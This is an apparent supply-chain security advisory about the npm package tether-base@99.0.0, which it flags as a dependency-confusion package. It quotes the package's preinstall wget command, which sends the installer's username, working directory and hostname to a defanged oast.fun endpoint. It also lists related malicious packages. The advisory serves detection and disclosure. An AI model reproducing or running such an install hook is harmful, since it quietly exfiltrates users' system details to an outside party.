tether-base@99.0.0
Malicious code in tether-base (npm)
Analysis
tether-base@99.0.0 is a dependency-confusion package that contains no functional code — the tarball is a single package.json file. On npm install, the preinstall script runs: wget --quiet "hxxp://cuwihexxxizbqmurenibmncf9zuih6fby[.]oast[.]fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)". This exfiltrates the installer's username, current working directory, and hostname to an oast[.]fun C2 endpoint via HTTP GET. The package was published at version 99.0.0 with a throwaway publisher identity and no repository, README, or source code, making it a classic dependency-confusion supply-chain attack that should be treated as malicious.
- analyzed by
- Leitwacht
- first seen
- Jun 14, 2026, 10:33 PM
- analyzed
- Jun 14, 2026, 10:34 PM
Related advisories
- tecken@0.1.10
- electron-internal-utils@1.0.0
- skipthedishes_react@0.1.0
- server-up-ndot@1.0.0
- rtms-manager@1.2.0
- rtms-manager-dev@1.3.0
- request-logger-canary@1.0.0
- redux-probe-unknown-action-rce@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.